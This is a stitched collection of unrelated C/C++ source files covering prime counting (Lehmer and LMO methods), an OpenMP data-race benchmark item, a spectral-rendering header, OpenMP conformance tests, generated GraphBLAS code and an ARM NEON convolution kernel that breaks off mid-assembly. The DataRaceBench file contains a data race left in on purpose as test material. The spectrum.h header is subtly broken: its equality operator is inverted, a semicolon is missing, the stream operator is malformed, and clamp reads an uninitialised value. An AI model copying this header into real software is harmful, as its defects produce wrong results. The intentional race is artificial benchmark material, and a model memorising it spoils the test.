if (verbose > 0) printf("lehmer %lu stage 2: phi(x,a) (z=%lu a=%lu b=%lu c=%lu)\n", n, z, a, b, c);
TIMING_START;
sum = phi(n, a) + ((b+a-2) * (b-a+1) / 2);
TIMING_END_PRINT("phi(x,a)")
/* We get an array of the first b primes. This is used in stage 4. If we
* get more than necessary, we can use them to speed up some.
*/
lastprime = b*SIEVE_MULT+1;
if (lastprime > 203280221) lastprime = 203280221;
if (verbose > 0) printf("lehmer %lu stage 3: %lu small primes\n", n, lastprime);
TIMING_START;
primes = generate_small_primes(lastprime);
lastpc = primes[lastprime];
TIMING_END_PRINT("small primes")
TIMING_START;
/* Speed up all the prime counts by doing a big base sieve */
prime_precalc( (UV) pow(n, 3.0/5.0) );
/* Ensure we have the base sieve for big prime_count ( n/primes[i] ). */
/* This is about 75k for n=10^13, 421k for n=10^15, 2.4M for n=10^17 */
prime_precalc(isqrt(n / primes[a+1]));
TIMING_END_PRINT("sieve precalc")
if (verbose > 0) printf("lehmer %lu stage 4: loop %lu to %lu, pc to %lu\n", n, a+1, b, n/primes[a+1]);
TIMING_START;
/* Reverse the i loop so w increases. Count w in segments. */
lastw = 0;
lastwpc = 0;
for (i = b; i >= a+1; i--) {
UV w = n / primes[i];
lastwpc = (w <= lastpc) ? bs_prime_count(w, primes, lastprime)
: lastwpc + _XS_prime_count(lastw+1, w);
lastw = w;
sum = sum - lastwpc;
if (i <= c) {
UV bi = bs_prime_count( isqrt(w), primes, lastprime );
for (j = i; j <= bi; j++) {
sum = sum - bs_prime_count(w / primes[j], primes, lastprime) + j - 1;
}
/* We could wrap the +j-1 in: sum += ((bi+1-i)*(bi+i))/2 - (bi-i+1); */
}
}
TIMING_END_PRINT("stage 4")
Safefree(primes);
return sum;
}
/* The Lagarias-Miller-Odlyzko method.
* Naive implementation without optimizations.
* About the same speed as Lehmer, a bit less memory.
* A better implementation can be 10-50x faster and much less memory.
*/
UV _XS_LMOS_pi(UV n)
{
UV n13, a, b, sum, i, j, k, lastprime, P2, S1, S2;
const uint32_t* primes = 0; /* small prime cache */
signed char* mu = 0; /* moebius to n^1/3 */
uint32_t* lpf = 0; /* least prime factor to n^1/3 */
cache_t pcache; /* Cache for recursive phi */
DECLARE_TIMING_VARIABLES;
if (n < SIEVE_LIMIT)
return _XS_prime_count(2, n);
n13 = icbrt(n); /* n13 = floor(n^1/3) [max 2642245] */
a = _XS_lehmer_pi(n13); /* a = Pi(floor(n^1/3)) [max 192725] */
b = _XS_lehmer_pi(isqrt(n)); /* b = Pi(floor(n^1/2)) [max 203280221] */
lastprime = b*SIEVE_MULT+1;
if (lastprime > 203280221) lastprime = 203280221;
if (lastprime < n13) lastprime = n13;
primes = generate_small_primes(lastprime);
New(0, mu, n13+1, signed char);
memset(mu, 1, sizeof(signed char) * (n13+1));
Newz(0, lpf, n13+1, uint32_t);
mu[0] = 0;
for (i = 1; i <= n13; i++) {
UV primei = primes[i];
for (j = primei; j <= n13; j += primei) {
mu[j] = -mu[j];
if (lpf[j] == 0) lpf[j] = primei;
}
k = primei * primei;
for (j = k; j <= n13; j += k)
mu[j] = 0;
}
lpf[1] = UVCONST(4294967295); /* Set lpf[1] to max */
/* Remove mu[i] == 0 using lpf */
for (i = 1; i <= n13; i++)
if (mu[i] == 0)
lpf[i] = 0;
/* Thanks to Kim Walisch for help with the S1+S2 calculations. */
k = (a < 7) ? a : 7;
S1 = 0;
S2 = 0;
phicache_init(&pcache);
TIMING_START;
for (i = 1; i <= n13; i++)
if (lpf[i] > primes[k])
/* S1 += mu[i] * phi_small(n/i, k, primes, lastprime, &pcache); */
S1 += mu[i] * phi(n/i, k);
TIMING_END_PRINT("S1")
TIMING_START;
for (i = k; i+1 < a; i++) {
uint32_t p = primes[i+1];
/* TODO: #pragma omp parallel for reduction(+: S2) firstprivate(pcache) schedule(dynamic, 16) */
for (j = (n13/p)+1; j <= n13; j++)
if (lpf[j] > p)
S2 += -mu[j] * phi_small(n / (j*p), i, primes, lastprime, &pcache);
}
TIMING_END_PRINT("S2")
phicache_free(&pcache);
Safefree(lpf);
Safefree(mu);
TIMING_START;
prime_precalc( (UV) pow(n, 2.9/5.0) );
P2 = Pk_2_p(n, a, b, primes, lastprime);
TIMING_END_PRINT("P2")
Safefree(primes);
/* printf("S1 = %lu\nS2 = %lu\na = %lu\nP2 = %lu\n", S1, S2, a, P2); */
sum = (S1 + S2) + a - 1 - P2;
return sum;
}
#ifdef PRIMESIEVE_STANDALONE
int main(int argc, char *argv[])
{
UV n, pi;
double t;
const char* method;
struct timeval t0, t1;
if (argc <= 1) { printf("usage: %s <n> [<method>]\n", argv[0]); return(1); }
n = strtoul(argv[1], 0, 10);
if (n < 2) { printf("Pi(%lu) = 0\n", n); return(0); }
if (argc > 2)
method = argv[2];
else
method = "lehmer";
gettimeofday(&t0, 0);
if (!strcasecmp(method, "lehmer")) { pi = _XS_lehmer_pi(n); }
else if (!strcasecmp(method, "meissel")) { pi = _XS_meissel_pi(n); }
else if (!strcasecmp(method, "legendre")) { pi = _XS_legendre_pi(n); }
else if (!strcasecmp(method, "lmo")) { pi = _XS_LMOS_pi(n); }
else if (!strcasecmp(method, "sieve")) { pi = _XS_prime_count(2, n); }
else {
printf("method must be one of: lehmer, meissel, legendre, lmo, or sieve\n");
return(2);
}
gettimeofday(&t1, 0);
t = (t1.tv_sec-t0.tv_sec); t *= 1000000.0; t += (t1.tv_usec - t0.tv_usec);
printf("%8s Pi(%lu) = %lu in %10.5fs\n", method, n, pi, t / 1000000.0);
return(0);
}
#endif
#else
#include "lehmer.h"
UV _XS_LMOS_pi(UV n) { if (n!=0) croak("Not compiled with Lehmer support"); return 0;}
UV _XS_lehmer_pi(UV n) { if (n!=0) croak("Not compiled with Lehmer support"); return 0;}
UV _XS_meissel_pi(UV n) { if (n!=0) croak("Not compiled with Lehmer support"); return 0;}
UV _XS_legendre_pi(UV n) { if (n!=0) croak("Not compiled with Lehmer support"); return 0;}
#endif
|
DRB010-lastprivatemissing-var-yes.c | /*
Copyright (c) 2017, Lawrence Livermore National Security, LLC.
Produced at the Lawrence Livermore National Laboratory
Written by Chunhua Liao, Pei-Hung Lin, Joshua Asplund,
Markus Schordan, and Ian Karlin
(email: liao6@llnl.gov, lin32@llnl.gov, asplund1@llnl.gov,
schordan1@llnl.gov, karlin1@llnl.gov)
LLNL-CODE-732144
All rights reserved.
This file is part of DataRaceBench. For details, see
https://github.com/LLNL/dataracebench. Please also see the LICENSE file
for our additional BSD notice.
Redistribution and use in source and binary forms, with
or without modification, are permitted provided that the following
conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the disclaimer below.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the disclaimer (as noted below)
in the documentation and/or other materials provided with the
distribution.
* Neither the name of the LLNS/LLNL nor the names of its contributors
may be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL LAWRENCE LIVERMORE NATIONAL
SECURITY, LLC, THE U.S. DEPARTMENT OF ENERGY OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
This loop has loop-carried output-dependence due to x=... at line 63.
The problem can be solved by using lastprivate(x) .
Data race pair: x@63:5 vs. x@63:5
*/
#include "omprace.h"
#include <omp.h>
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char* argv[])
{
omprace_init();
int i,x;
int len = 10000;
if (argc>1)
len = atoi(argv[1]);
#pragma omp parallel for private (i)
for (i=0;i<len;i++)
x=i;
printf("x=%d",x);
omprace_fini();
return 0;
}
|
spectrum.h | #pragma once
#include <boost/array.hpp>
#include <cmath>
#include <limits>
#include <vector>
#include "std.h"
#include "glm.h"
#include <boost/range/irange.hpp>
namespace framework {
static inline vec3 xyz_to_rgb(const vec3 & xyz) noexcept {
return vec3{
3.240479f * xyz[0] - 1.537150f * xyz[1] - 0.498535f * xyz[2],
-0.969256f * xyz[0] + 1.875991f * xyz[1] + 0.041556f * xyz[2],
0.055648f * xyz[0] - 0.204043f * xyz[1] + 1.057311f * xyz[2]
};
}
static inline vec3 rgb_to_xyz(const vec3 & rgb) noexcept {
return vec3{
0.412453f * rgb[0] + 0.357580f * rgb[1] + 0.180423f * rgb[2],
0.212671f * rgb[0] + 0.715160f * rgb[1] + 0.072169f * rgb[2],
0.019334f * rgb[0] + 0.119193f * rgb[1] + 0.950227f * rgb[2]
};
}
// Spectral Data Declarations
static const int nCIESamples = 471;
extern const float CIE_X[nCIESamples];
extern const float CIE_Y[nCIESamples];
extern const float CIE_Z[nCIESamples];
extern const float CIE_lambda[nCIESamples];
static const float CIE_Y_integral = 106.856895f;
static const int nRGB2SpectSamples = 32;
extern const float RGB2SpectLambda[nRGB2SpectSamples];
extern const float RGBRefl2SpectWhite[nRGB2SpectSamples];
extern const float RGBRefl2SpectCyan[nRGB2SpectSamples];
extern const float RGBRefl2SpectMagenta[nRGB2SpectSamples];
extern const float RGBRefl2SpectYellow[nRGB2SpectSamples];
extern const float RGBRefl2SpectRed[nRGB2SpectSamples];
extern const float RGBRefl2SpectGreen[nRGB2SpectSamples];
extern const float RGBRefl2SpectBlue[nRGB2SpectSamples];
extern const float RGBIllum2SpectWhite[nRGB2SpectSamples];
extern const float RGBIllum2SpectCyan[nRGB2SpectSamples];
extern const float RGBIllum2SpectMagenta[nRGB2SpectSamples];
extern const float RGBIllum2SpectYellow[nRGB2SpectSamples];
extern const float RGBIllum2SpectRed[nRGB2SpectSamples];
extern const float RGBIllum2SpectGreen[nRGB2SpectSamples];
extern const float RGBIllum2SpectBlue[nRGB2SpectSamples];
template <size_t N> struct spectrum : array<float, N> {
// permit array initialization list syntax
template <typename... floats>
spectrum(floats && ... ts) : array { ts... } {}
// strictly more powerful version of map that also zips
template <typename F>
inline spectrum map(F f) const noexcept {
spectrum result;
for (size_t i = 0; i < N; ++i) result[i] = f(data()[i]);
return result;
}
// in place modification
template <typename F> inline spectrum & modify(F f) {
for (size_t i = 0;i < N; ++i) f(data()[i]);
return *this;
}
inline spectrum & operator+=(const spectrum & that) {
//#pragma omp simd
for (size_t i = 0; i < N; ++i) data()[i] += that[i];
return *this;
}
inline spectrum & operator-=(const spectrum & that) {
//#pragma omp simd
for (size_t i = 0; i < N; ++i) data()[i] -= that[i];
return *this;
}
inline spectrum & operator*=(const spectrum & that) {
//#pragma omp simd
for (size_t i = 0; i < N; ++i) data()[i] *= that[i];
return *this;
}
inline spectrum & operator/=(const spectrum & that) {
//#pragma omp simd
for (size_t i = 0; i < N; ++i) data()[i] /= that[i];
return *this;
}
bool operator==(const spectrum & that) const {
if (this == &that) return true; // reference equality, ignoring nan-sense.
for (size_t i = 0; i < N; ++i)
if (data()[i] == that[i]) return false;
return true;
}
bool operator!=(const spectrum & that) const {
return !(*this == that)
}
inline spectrum operator+(const spectrum & that) const {
spectrum result;
//#pragma omp simd
for (size_t i = 0; i < N; ++i) result[i] = data()[i] + that[i];
return result;
}
inline spectrum operator-(const spectrum & that) const {
spectrum result;
//#pragma omp simd
for (size_t i = 0; i < N; ++i) result[i] = data()[i] - that[i];
return result;
}
// pointwise
inline spectrum operator*(const spectrum & that) const {
spectrum result;
//#pragma omp simd
for (size_t i = 0; i < N; ++i) result[i] = data()[i] * that[i];
return result;
}
// pointwise
inline spectrum operator/(const spectrum & that) const {
spectrum result;
//#pragma omp simd
for (size_t i = 0; i < N; ++i) result[i] = data()[i] / that[i];
return result;
}
friend inline spectrum operator * (float a, const spectrum & s) {
return s * a;
}
inline spectrum operator*=(float scale) {
//#pragma omp simd
for (size_t i = 0; i < N; ++i) data()[i] *= scale;
return *this;
}
inline spectrum operator*(float scale) const {
spectrum result;
//#pragma omp simd
for (size_t i = 0; i < N; ++i) result[i] = data()[i] * scale;
return result;
}
inline spectrum operator/=(float scale) noexcept {
//#pragma omp simd
for (size_t i = 0; i < N; ++i) data()[i] /= scale;
return *this;
}
inline spectrum operator/(float scale) const noexcept {
spectrum result;
//#pragma omp simd
for (size_t i = 0; i < N; ++i) result[i] = data()[i] / scale;
return result;
}
inline bool is_black() const noexcept {
for (auto && c : data())
if (c != 0.f)
return false;
return true;
}
inline spectrum exp() const noexcept { return map(&expf); }
inline spectrum log() const noexcept { return map(&logf); }
inline spectrum log1p() const noexcept { return map(&log1pf); }
inline spectrum expm1() const noexcept { return map(&expm1f); }
// this generalization lets us use scalar-vector products for the members.
float dot(const spectrum & that) const noexcept {
float result = 0;
//#pragma omp simd reduction(+:result)
for (size_t i = 0; i < N; ++i) result += data()[i] * that.data()[i];
return result;
}
template <typename ostream>
friend ostream & operator<<(ostream & os, const spectrum) {
os << "[";
if (N > 0) os << spectrum[0];
for (int i = 1; i < N; ++i)
os << ", " << spectrum[i];
os << "]";
}
spectrum clamp(float low = 0, float high = std::numeric_limits<float>::infinity()) {
spectrum result;
//#pragma omp simd
for (size_t i = 0;i < N; ++i) result[i] = glm::clamp(result[i], low, high);
return result;
}
};
static const size_t sampled_lambda_start = 400;
static const size_t sampled_lambda_end = 700;
static const size_t spectral_samples = 60;
extern float average_spectrum_samples(const float * lambda, const float * vals, int n, float lambdaStart, float lambdaEnd);
enum struct spectrum_type {
illuminant,
reflectance
};
struct sampled_spectrum : spectrum<spectral_samples> {
template <typename... floats>
sampled_spectrum(floats && ... ts) : spectrum { ts... } {}
template <size_t N> static sampled_spectrum from_sorted_samples(const float lambda[N], const float v[N]) {
return from_sorted_samples(lambda, v, N);
}
static sampled_spectrum from_sorted_samples(const float * lambda, const float * v, int n) {
sampled_spectrum result;
auto start = float(sampled_lambda_start), end = float(sampled_lambda_end);
for (int i = 0; i < spectral_samples; ++i) {
float lambda0 = lerp(start, end, float(i));
float lambda1 = lerp(start, end, float(i + 1));
result[i] = average_spectrum_samples(lambda, v, n, lambda0, lambda1);
}
return result;
}
template <size_t N> static sampled_spectrum from_samples(const float lambda[N], const float v[N]) {
return from_samples(lambda, v, N);
}
static sampled_spectrum from_samples(const float * lambda, const float * v, int n) {
if (!std::is_sorted(lambda, lambda + n)) {
auto range = boost::irange<int>(0, n);
vector<int> indices(range.begin(), range.end());
std::sort(indices.begin(), indices.end(), [lambda](int a, int b) {
return lambda[a] < lambda[b];
});
vector<float> slambda(n), sv(n);
for (int i = 0; i < n;++i) {
int j = indices[i];
slambda[i] = lambda[j];
sv[i] = v[j];
}
return from_sorted_samples(slambda.data(), sv.data(), n);
} else {
return from_sorted_samples(lambda, v, n);
}
}
static sampled_spectrum from_rgb(vec3 rgb, spectrum_type type = spectrum_type::illuminant);
static sampled_spectrum from_xyz(vec3 xyz, spectrum_type type = spectrum_type::illuminant) {
return from_rgb(xyz_to_rgb(xyz), type);
}
vec3 to_xyz() const noexcept;
vec3 to_rgb() const noexcept {
return xyz_to_rgb(to_xyz());
}
};
}
/*
pbrt source code is Copyright(c) 1998-2015
Matt Pharr, Greg Humphreys, and Wenzel Jakob.
This file is part of pbrt.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
- Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Modified by Edward Kmett
*/ |
omp_threadprivate.c | /*
*
* threadprivate is tested in 2 ways
* 1. The global variable declared as threadprivate should have local copy
* for each thread. Otherwise race condition for wrong result
* 2. if the value of local copy is retained for two adjacent parallel region
*/
#include "omp_testsuite.h"
#include <stdlib.h>
#include <stdio.h>
#include <omp.h>
static int sum0 = 0;
#pragma omp threadprivate(sum0)
static int myvalue = 0;
#pragma omp threadprivate(myvalue)
int
check_omp_threadprivate (FILE * logFile)
{
int sum = 0;
int known_sum;
int i;
int iter;
int *data;
int size;
int failed = 0;
int my_random;
omp_set_dynamic (0);
#pragma omp parallel
{
sum0 = 0;
#pragma omp for
for (i = 1; i <= LOOPCOUNT; i++)
{
sum0 = sum0 + i;
} /*end of for */
#pragma omp critical
{
sum = sum + sum0;
} /*end of critical */
} /* end of parallel */
known_sum = (LOOPCOUNT * (LOOPCOUNT + 1)) / 2;
if (known_sum != sum)
{
fprintf (logFile, " known_sum = %d , sum = %d \n", known_sum, sum);
}
/* the next parallel region is just used to get the number of threads */
omp_set_dynamic (0);
#pragma omp parallel
{
#pragma omp master
{
size = omp_get_num_threads ();
data = (int *) malloc (size * sizeof (int));
}
} /* end parallel */
srand (45);
for (iter = 0; iter < 100; iter++)
{
my_random = rand (); /* random number generator is called inside serial region */
/* the first parallel region is used to initialiye myvalue and the array with my_random+rank */
#pragma omp parallel
{
int rank;
rank = omp_get_thread_num ();
myvalue = data[rank] = my_random + rank;
}
/* the second parallel region verifies that the value of "myvalue" is retained */
#pragma omp parallel reduction(+:failed)
{
int rank;
rank = omp_get_thread_num ();
failed = failed + (myvalue != data[rank]);
if (myvalue != data[rank])
{
fprintf (logFile, " myvalue = %d, data[rank]= %d\n", myvalue,data[rank]);
}
}
}
free (data);
return (known_sum == sum) && !failed;
} /* end of check_threadprivate */
static int crosssum0 = 0;
/*#pragma omp threadprivate(crosssum0)*/
static int crossmyvalue = 0;
/*#pragma omp threadprivate(crossmyvalue)*/
int
crosscheck_omp_threadprivate (FILE * logFile)
{
int sum = 0;
int known_sum;
int i;
int iter;
int *data;
int size;
int failed = 0;
int my_random;
omp_set_dynamic (0);
#pragma omp parallel
{
crosssum0 = 0;
#pragma omp for
for (i = 1; i < LOOPCOUNT; i++)
{
crosssum0 = crosssum0 + i;
} /*end of for */
#pragma omp critical
{
sum = sum + crosssum0;
} /*end of critical */
} /* end of parallel */
known_sum = (LOOPCOUNT * (LOOPCOUNT + 1)) / 2;
#pragma omp parallel
{
#pragma omp master
{
size = omp_get_num_threads ();
data = (int *) malloc (size * sizeof (int));
}
}
srand (45);
for (iter = 0; iter < 100; iter++)
{
my_random = rand ();
#pragma omp parallel
{
int rank;
rank = omp_get_thread_num ();
crossmyvalue = data[rank] = my_random + rank;
}
#pragma omp parallel reduction(+:failed)
{
int rank;
rank = omp_get_thread_num ();
failed = failed + (crossmyvalue != data[rank]);
}
}
free (data);
return (known_sum == sum) && !failed;
} /* end of crosscheck_threadprivate */
|
omp_parallel_for.c | <ompts:test>
<ompts:testdescription>Test which checks the omp parallel for directive.</ompts:testdescription>
<ompts:ompversion>1.0</ompts:ompversion>
<ompts:directive>omp parallel for</ompts:directive>
<ompts:dependences></ompts:dependences>
<ompts:testcode>
#include "omp_testsuite.h"
#include <stdio.h>
int <ompts:testcode:functionname>omp_parallel_for</ompts:testcode:functionname>(FILE * logFile){
int i;
int data[LOOPCOUNT];
<ompts:check>#pragma omp parallel for</ompts:check>
for (i = 0; i < LOOPCOUNT; i++)
{
data[i] = i;
}
for (i = 0; i < LOOPCOUNT; i++)
{
if (data[i] != i) return 0;
}
return 1;
}
</ompts:testcode>
</ompts:test>
|
GB_unaryop__lnot_int64_int8.c | //------------------------------------------------------------------------------
// GB_unaryop: hard-coded functions for each built-in unary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2019, All Rights Reserved.
// http://suitesparse.com See GraphBLAS/Doc/License.txt for license.
//------------------------------------------------------------------------------
// If this file is in the Generated/ folder, do not edit it (auto-generated).
#include "GB.h"
#ifndef GBCOMPACT
#include "GB_control.h"
#include "GB_iterator.h"
#include "GB_unaryop__include.h"
// C=unop(A) is defined by the following types and operators:
// op(A) function: GB_unop__lnot_int64_int8
// op(A') function: GB_tran__lnot_int64_int8
// C type: int64_t
// A type: int8_t
// cast: int64_t cij = (int64_t) aij
// unaryop: cij = !(aij != 0)
#define GB_ATYPE \
int8_t
#define GB_CTYPE \
int64_t
// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA) \
int8_t aij = Ax [pA]
#define GB_CX(p) Cx [p]
// unary operator
#define GB_OP(z, x) \
z = !(x != 0) ;
// casting
#define GB_CASTING(z, x) \
int64_t z = (int64_t) x ;
// cij = op (cast (aij))
#define GB_CAST_OP(pC,pA) \
{ \
/* aij = Ax [pA] */ \
GB_GETA (aij, Ax, pA) ; \
/* Cx [pC] = op (cast (aij)) */ \
GB_CASTING (x, aij) ; \
GB_OP (GB_CX (pC), x) ; \
}
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_LNOT || GxB_NO_INT64 || GxB_NO_INT8)
//------------------------------------------------------------------------------
// Cx = op (cast (Ax)): apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB_unop__lnot_int64_int8
(
int64_t *restrict Cx,
const int8_t *restrict Ax,
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (int64_t p = 0 ; p < anz ; p++)
{
GB_CAST_OP (p, p) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = op (cast (A')): transpose, typecast, and apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB_tran__lnot_int64_int8
(
GrB_Matrix C,
const GrB_Matrix A,
int64_t **Rowcounts,
GBI_single_iterator Iter,
const int64_t *restrict A_slice,
int naslice
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#define GB_PHASE_2_OF_2
#include "GB_unaryop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
|
zq_cnn_convolution_gemm_nchwc_kernel1x1_neon_raw.h | #define __ARMV8 1
static void conv1x1s1_sgemm_transform_kernel_neon(const Mat& _kernel, Mat& kernel_tm, int inch, int outch)
{
const float* kernel = _kernel;
// interleave
#if __ARMV8
kernel_tm.create(4 * 8, inch / 4 + inch % 4, outch / 8 + (outch % 8) / 4 + outch % 4);
#else
kernel_tm.create(4 * 4, inch / 4 + inch % 4, outch / 4 + outch % 4);
#endif // __ARM_NEON && __ARMV8
int p = 0;
#if __ARMV8
for (; p + 7<outch; p += 8)
{
const float* kernel0 = kernel + (p + 0)*inch;
const float* kernel1 = kernel + (p + 1)*inch;
const float* kernel2 = kernel + (p + 2)*inch;
const float* kernel3 = kernel + (p + 3)*inch;
const float* kernel4 = kernel + (p + 4)*inch;
const float* kernel5 = kernel + (p + 5)*inch;
const float* kernel6 = kernel + (p + 6)*inch;
const float* kernel7 = kernel + (p + 7)*inch;
float* ktmp = kernel_tm.channel(p / 8);
for (int q = 0; q<inch; q++)
{
// kernel0...7 0
ktmp[0] = kernel0[0];
ktmp[1] = kernel1[0];
ktmp[2] = kernel2[0];
ktmp[3] = kernel3[0];
ktmp[4] = kernel4[0];
ktmp[5] = kernel5[0];
ktmp[6] = kernel6[0];
ktmp[7] = kernel7[0];
ktmp += 8;
kernel0 += 1;
kernel1 += 1;
kernel2 += 1;
kernel3 += 1;
kernel4 += 1;
kernel5 += 1;
kernel6 += 1;
kernel7 += 1;
}
}
#endif // __ARMV8
for (; p + 3<outch; p += 4)
{
const float* kernel0 = kernel + (p + 0)*inch;
const float* kernel1 = kernel + (p + 1)*inch;
const float* kernel2 = kernel + (p + 2)*inch;
const float* kernel3 = kernel + (p + 3)*inch;
#if __ARMV8
float* ktmp = kernel_tm.channel(p / 8 + (p % 8) / 4);
#else
float* ktmp = kernel_tm.channel(p / 4);
#endif // __ARMV8
for (int q = 0; q<inch; q++)
{
// kernel0...3 0
ktmp[0] = kernel0[0];
ktmp[1] = kernel1[0];
ktmp[2] = kernel2[0];
ktmp[3] = kernel3[0];
ktmp += 4;
kernel0 += 1;
kernel1 += 1;
kernel2 += 1;
kernel3 += 1;
}
}
for (; p<outch; p++)
{
const float* kernel0 = kernel + p*inch;
#if __ARMV8
float* ktmp = kernel_tm.channel(p / 8 + (p % 8) / 4 + p % 4);
#else
float* ktmp = kernel_tm.channel(p / 4 + p % 4);
#endif //__ARMV8
for (int q = 0; q<inch; q++)
{
ktmp[0] = kernel0[0];
ktmp++;
kernel0++;
}
}
}
static void conv1x1s1_sgemm_neon(const Mat& bottom_blob, Mat& top_blob, const Mat& kernel, const Mat& _bias, const Option& opt)
{
int w = bottom_blob.w;
int h = bottom_blob.h;
int inch = bottom_blob.c;
int outch = top_blob.c;
const int size = w * h;
const float* bias = _bias;
// interleave
Mat tmp(8 * 4, inch / 4 + inch % 4, size / 8 + (size % 8) / 4 + size % 4, 4u, opt.workspace_allocator);
{
int nn_size = size >> 3;
int remain_size_start = nn_size << 3;
#pragma omp parallel for num_threads(opt.num_threads)
for (int ii = 0; ii<nn_size; ii++)
{
int i = ii * 8;
const float* img0 = bottom_blob.channel(0);
img0 += i;
float* tmpptr = tmp.channel(i / 8);
for (int q = 0; q<inch; q++)
{
#if __ARMV8
vst1q_f32(tmpptr, vld1q_f32(img0));
vst1q_f32(tmpptr + 4, vld1q_f32(img0 + 4));
tmpptr += 8;
img0 += bottom_blob.cstep;
#else
asm volatile(
"pld [%0, #256] \n"
"vld1.f32 {d0-d3}, [%0 :128] \n"
"vst1.f32 {d0-d3}, [%1 :128]! \n"
: "=r"(img0), // %0
"=r"(tmpptr) // %1
: "0"(img0),
"1"(tmpptr)
: "memory", "q0", "q1"
);
img0 += bottom_blob.cstep;
#endif // __ARMV8
}
}
nn_size = (size - remain_size_start) >> 2;
#pragma omp parallel for num_threads(opt.num_threads)
for (int ii = 0; ii<nn_size; ii++)
{
int i = remain_size_start + ii * 4;
const float* img0 = bottom_blob.channel(0);
img0 += i;
float* tmpptr = tmp.channel(i / 8 + (i % 8) / 4);
for (int q = 0; q<inch; q++)
{
#if __ARMV8
vst1q_f32(tmpptr, vld1q_f32(img0));
tmpptr += 4;
img0 += bottom_blob.cstep;
#else
asm volatile(
"pld [%0, #128] \n"
"vld1.f32 {d0-d1}, [%0 :128] \n"
"vst1.f32 {d0-d1}, [%1 :128]! \n"
: "=r"(img0), // %0
"=r"(tmpptr) // %1
: "0"(img0),
"1"(tmpptr)
: "memory", "q0"
);
img0 += bottom_blob.cstep;
#endif // __ARMV8
}
}
remain_size_start += nn_size << 2;
#pragma omp parallel for num_threads(opt.num_threads)
for (int i = remain_size_start; i<size; i++)
{
const float* img0 = bottom_blob.channel(0);
img0 += i;
float* tmpptr = tmp.channel(i / 8 + (i % 8) / 4 + i % 4);
for (int q = 0; q<inch; q++)
{
tmpptr[0] = img0[0];
tmpptr++;
img0 += bottom_blob.cstep;
}
}
}
int nn_outch = 0;
int remain_outch_start = 0;
#if __ARMV8
nn_outch = outch >> 3;
remain_outch_start = nn_outch << 3;
#pragma omp parallel for num_threads(opt.num_threads)
for (int pp = 0; pp<nn_outch; pp++)
{
int p = pp * 8;
float* outptr0 = top_blob.channel(p);
float* outptr1 = top_blob.channel(p + 1);
float* outptr2 = top_blob.channel(p + 2);
float* outptr3 = top_blob.channel(p + 3);
float* outptr4 = top_blob.channel(p + 4);
float* outptr5 = top_blob.channel(p + 5);
float* outptr6 = top_blob.channel(p + 6);
float* outptr7 = top_blob.channel(p + 7);
const float zeros[8] = { 0.f, 0.f, 0.f, 0.f, 0.f, 0.f, 0.f, 0.f };
const float* biasptr = bias ? bias + p : zeros;
int i = 0;
for (; i + 7<size; i += 8)
{
const float* tmpptr = tmp.channel(i / 8);
const float* kptr = kernel.channel(p / 8);
asm volatile(
"ld1 {v0.4s, v1.4s}, [%20] \n"
"dup v16.4s, v0.s[0] \n"
"dup v17.4s, v0.s[0] \n"
"dup v18.4s, v0.s[1] \n"
"dup v19.4s, v0.s[1] \n"
"dup v20.4s, v0.s[2] \n"
"dup v21.4s, v0.s[2] \n"
"dup v22.4s, v0.s[3] \n"
"dup v23.4s, v0.s[3] \n"
"dup v24.4s, v1.s[0] \n"
"dup v25.4s, v1.s[0] \n"
"dup v26.4s, v1.s[1] \n"
"dup v27.4s, v1.s[1] \n"
"dup v28.4s, v1.s[2] \n"
